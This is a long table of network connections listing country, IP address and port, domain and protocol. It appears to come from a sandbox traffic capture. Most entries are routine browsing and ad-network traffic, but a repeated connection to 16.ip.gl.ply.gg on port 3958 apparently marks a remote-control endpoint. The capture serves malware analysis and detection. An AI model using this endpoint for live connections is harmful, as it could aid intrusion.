| DE | 13.32.27.114:443 | widget.intercom.io | tcp |
| US | 8.8.8.8:53 | js.intercomcdn.com | udp |
| DE | 18.66.147.3:443 | js.intercomcdn.com | tcp |
| DE | 18.66.147.3:443 | js.intercomcdn.com | tcp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| US | 52.3.143.140:443 | api-iam.intercom.io | tcp |
| US | 8.8.8.8:53 | nexus-websocket-a.intercom.io | udp |
| US | 34.237.73.95:443 | nexus-websocket-a.intercom.io | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 20.82.124.160:443 | analytics.filemail.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c23.gcp.gvt2.com | udp |
| US | 35.184.229.211:443 | e2c23.gcp.gvt2.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 52.3.143.140:443 | api-iam.intercom.io | tcp |
| DE | 172.217.16.131:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c68.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c42.gcp.gvt2.com | udp |
| US | 34.35.20.64:443 | e2c68.gcp.gvt2.com | tcp |
| DE | 35.207.191.46:443 | e2c42.gcp.gvt2.com | tcp |
| US | 34.35.20.64:443 | e2c68.gcp.gvt2.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | processhacker.sourceforge.io | udp |
| US | 104.18.39.207:443 | processhacker.sourceforge.io | tcp |
| US | 104.18.39.207:443 | processhacker.sourceforge.io | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | udp |
| FR | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| GB | 142.250.200.4:80 | www.google.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 104.18.39.207:443 | processhacker.sourceforge.io | tcp |
| US | 104.18.39.207:443 | processhacker.sourceforge.io | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 74.125.206.157:443 | stats.g.doubleclick.net | tcp |
| US | 104.18.37.111:443 | sourceforge.net | udp |
| US | 8.8.8.8:53 | a.fsdn.com | udp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | d.delivery.consentmanager.net | udp |
| US | 8.8.8.8:53 | cdn.consentmanager.net | udp |
| US | 8.8.8.8:53 | c.sf-syn.com | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| GB | 195.181.164.21:443 | cdn.consentmanager.net | tcp |
| US | 104.18.33.97:443 | c.sf-syn.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | analytics.slashdotmedia.com | udp |
| US | 8.8.8.8:53 | ml314.com | udp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| IE | 52.212.56.60:443 | dpm.demdex.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| IE | 52.19.8.73:443 | sync.crwdcntrl.net | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| DE | 3.127.178.105:443 | ps.eyeota.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | e3270d7d5b7b487514d3625dee184e7e.safeframe.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | e3270d7d5b7b487514d3625dee184e7e.safeframe.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | e3270d7d5b7b487514d3625dee184e7e.safeframe.googlesyndication.com | udp |
| FR | 216.58.204.66:443 | www.googletagservices.com | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.187.198:443 | s0.2mdn.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| GB | 142.250.200.34:443 | googleads4.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | googleads4.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| DE | 37.252.171.52:443 | secure.adnxs.com | tcp |
| GB | 164.132.25.181:443 | ssbsync.smartadserver.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| DE | 3.68.18.56:443 | match.sharethrough.com | tcp |
| DE | 3.68.18.56:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| NL | 185.29.134.244:443 | sync.mathtag.com | tcp |
| FR | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 52.95.118.179:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 52.19.8.73:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | a.audrte.com | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| IE | 52.48.177.163:443 | a.audrte.com | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| DK | 37.157.6.243:443 | c1.adform.net | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| NL | 185.29.134.244:443 | sync.mathtag.com | tcp |
| IE | 54.228.140.66:443 | pr-bh.ybp.yahoo.com | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | dmp.adform.net | udp |
| DK | 37.157.2.229:443 | dmp.adform.net | tcp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| NL | 198.47.127.20:443 | simage4.pubmatic.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| DK | 37.157.6.243:443 | c1.adform.net | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| US | 8.8.8.8:53 | pixel.onaudience.com | udp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| DE | 85.114.159.93:443 | dsp.adfarm1.adition.com | tcp |
| US | 54.224.142.7:443 | sync.srv.stackadapt.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 172.67.13.182:443 | mwzeom.zeotap.com | tcp |
| DE | 91.228.74.166:443 | cms.quantserve.com | tcp |
| IE | 52.30.179.44:443 | match.prod.bidr.io | tcp |
| DE | 35.157.253.10:443 | x.bidswitch.net | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| FR | 141.94.171.216:443 | pixel.onaudience.com | tcp |
| DE | 91.228.74.166:443 | cms.quantserve.com | tcp |
| DE | 85.114.159.93:443 | dsp.adfarm1.adition.com | tcp |
| US | 54.224.142.7:443 | sync.srv.stackadapt.com | tcp |
| DE | 35.157.253.10:443 | x.bidswitch.net | tcp |
| IE | 52.30.179.44:443 | match.prod.bidr.io | tcp |
| NL | 98.98.134.241:443 | pixel-sync.sitescout.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| NL | 63.215.202.172:443 | pubmatic-match.dotomi.com | tcp |
| US | 172.67.13.182:443 | mwzeom.zeotap.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| FR | 141.94.171.216:443 | pixel.onaudience.com | tcp |
| NL | 63.215.202.172:443 | pubmatic-match.dotomi.com | tcp |
| NL | 98.98.134.241:443 | pixel-sync.sitescout.com | tcp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| NL | 198.47.127.20:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 104.18.33.97:443 | c.sf-syn.com | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 8.8.8.8:53 | tags.bluekai.com | udp |
| DE | 3.127.178.105:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 151.101.1.44:443 | trc.taboola.com | tcp |
| US | 2.19.169.14:443 | tags.bluekai.com | tcp |
| US | 8.8.8.8:53 | 6cee2ff7eec00c7170bd03cf9ead5d7a.safeframe.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | 6cee2ff7eec00c7170bd03cf9ead5d7a.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 172.217.16.225:443 | cdn.ampproject.org | tcp |
| GB | 172.217.16.225:443 | cdn.ampproject.org | tcp |
| GB | 172.217.16.225:443 | cdn.ampproject.org | tcp |
| GB | 172.217.16.225:443 | cdn.ampproject.org | tcp |
| GB | 172.217.16.225:443 | cdn.ampproject.org | tcp |
| GB | 172.217.16.225:443 | cdn.ampproject.org | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| DE | 37.252.171.52:443 | secure.adnxs.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| NL | 213.19.162.90:443 | pixel.rubiconproject.com | tcp |
| DE | 3.68.18.56:443 | match.sharethrough.com | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| CH | 185.29.132.241:443 | sync.mathtag.com | tcp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| CH | 185.29.132.241:443 | sync.mathtag.com | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | 057171fac96702812a93e474168c5edf.safeframe.googlesyndication.com | udp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| NL | 213.19.162.90:443 | pixel.rubiconproject.com | tcp |
| GB | 164.132.25.181:443 | ssbsync.smartadserver.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| DE | 37.252.171.52:443 | secure.adnxs.com | tcp |
| DE | 3.68.18.56:443 | match.sharethrough.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| US | 8.8.8.8:53 | green.erne.co | udp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| NL | 72.251.241.204:443 | cm.adgrx.com | tcp |
| NL | 35.214.128.77:443 | csync.loopme.me | tcp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| SE | 213.155.156.185:443 | d5p.de17a.com | tcp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| FR | 141.95.171.140:443 | green.erne.co | tcp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| NL | 64.227.64.62:443 | match.adsby.bidtheatre.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| NL | 198.47.127.20:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 8.8.8.8:53 | altushost-swe.dl.sourceforge.net | udp |
| SE | 79.142.76.130:443 | altushost-swe.dl.sourceforge.net | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| DE | 3.122.93.43:443 | btlr.sharethrough.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 8.8.8.8:53 | loadus.exelator.com | udp |
| DE | 3.127.178.105:443 | ps.eyeota.net | tcp |
| DE | 18.198.69.109:443 | loadus.exelator.com | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | 2cd3b9f51d6831d2eae1f66d2d03a282.safeframe.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | 2cd3b9f51d6831d2eae1f66d2d03a282.safeframe.googlesyndication.com | tcp |
| GB | 142.250.179.225:443 | 2cd3b9f51d6831d2eae1f66d2d03a282.safeframe.googlesyndication.com | udp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| GB | 164.132.25.181:443 | ssbsync.smartadserver.com | tcp |
| DE | 37.252.171.52:443 | secure.adnxs.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| GB | 185.64.190.79:443 | image8.pubmatic.com | tcp |
| DE | 3.68.18.56:443 | match.sharethrough.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | image4.pubmatic.com | udp |
| NL | 198.47.127.20:443 | image4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 104.18.25.173:443 | a.tribalfusion.com | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 104.18.33.97:443 | c.sf-syn.com | udp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| DE | 3.72.143.230:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| DE | 3.121.27.153:443 | ps.eyeota.net | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com | tcp |
| GB | 142.250.187.198:443 | s0.2mdn.net | udp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| GB | 142.250.200.34:443 | googleads4.g.doubleclick.net | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| GB | 142.250.187.198:443 | s0.2mdn.net | tcp |
| GB | 142.250.200.34:443 | googleads4.g.doubleclick.net | tcp |
| NL | 81.17.55.109:443 | ssbsync.smartadserver.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 213.19.162.90:443 | pixel.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| NL | 198.47.127.20:443 | image4.pubmatic.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| DE | 3.64.26.145:443 | match.sharethrough.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 74.125.192.94:443 | beacons2.gvt2.com | tcp |
| US | 74.125.192.94:443 | beacons2.gvt2.com | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| DE | 3.72.143.230:443 | btlr.sharethrough.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| NL | 216.52.2.39:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | e2c15.gcp.gvt2.com | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 34.105.225.79:443 | e2c15.gcp.gvt2.com | tcp |
| GB | 142.250.179.225:443 | 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com | udp |
| DE | 172.217.16.131:443 | beacons.gvt2.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| DE | 172.217.16.131:443 | beacons.gvt2.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| NL | 216.52.2.30:443 | ap.lijit.com | tcp |
| DE | 3.65.163.105:443 | btlr.sharethrough.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| GB | 142.250.179.225:443 | 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com | udp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 74.125.192.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| US | 74.125.192.94:443 | beacons2.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| DE | 3.65.163.105:443 | btlr.sharethrough.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 216.52.2.30:443 | ap.lijit.com | tcp |
| NL | 216.52.2.30:443 | ap.lijit.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.179.225:443 | 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 213.19.162.91:443 | fastlane.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| NL | 216.52.2.16:443 | ap.lijit.com | tcp |
| NL | 216.52.2.16:443 | ap.lijit.com | tcp |
| DE | 3.74.135.144:443 | btlr.sharethrough.com | tcp |
| DE | 3.74.135.144:443 | btlr.sharethrough.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.179.225:443 | 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 74.125.192.94:443 | beacons2.gvt2.com | udp |
| FR | 172.217.18.195:443 | beacons.gvt2.com | udp |
| FR | 172.217.18.195:443 | beacons.gvt2.com | tcp |
